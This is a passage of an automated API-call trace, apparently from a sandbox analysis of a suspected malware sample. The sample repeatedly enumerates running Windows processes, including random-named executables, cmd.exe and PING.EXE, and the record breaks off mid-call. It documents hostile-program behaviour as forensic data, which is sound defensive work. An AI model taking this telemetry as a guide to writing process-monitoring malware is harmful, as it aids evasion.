[0101.374] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.378] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.379] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.382] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.441] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.442] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.444] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.445] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.446] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.448] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.449] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.451] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.452] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.454] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.456] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.457] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.459] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.460] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0101.461] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0101.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0101.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0101.465] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0101.467] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0101.468] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0101.470] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0101.471] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0101.473] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0101.474] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0101.475] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0101.476] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0101.477] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0101.519] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.520] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0101.521] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.522] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.524] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb74, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.525] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.526] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbbc, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0101.527] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0101.528] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xb88, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0101.530] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0101.531] CloseHandle (hObject=0xbc) returned 1 [0101.531] Sleep (dwMilliseconds=0x12c) [0101.830] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0101.836] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0101.837] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0101.837] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0101.838] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.839] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0101.840] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0101.840] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0101.841] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0101.842] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0101.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0101.843] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.844] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.845] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.846] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.858] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.858] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0101.859] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.860] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.860] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0101.870] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.873] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0101.874] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0101.875] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0101.877] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0101.878] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0101.879] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0101.881] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0101.882] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0101.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0101.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0101.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0101.887] Process32NextW (in: 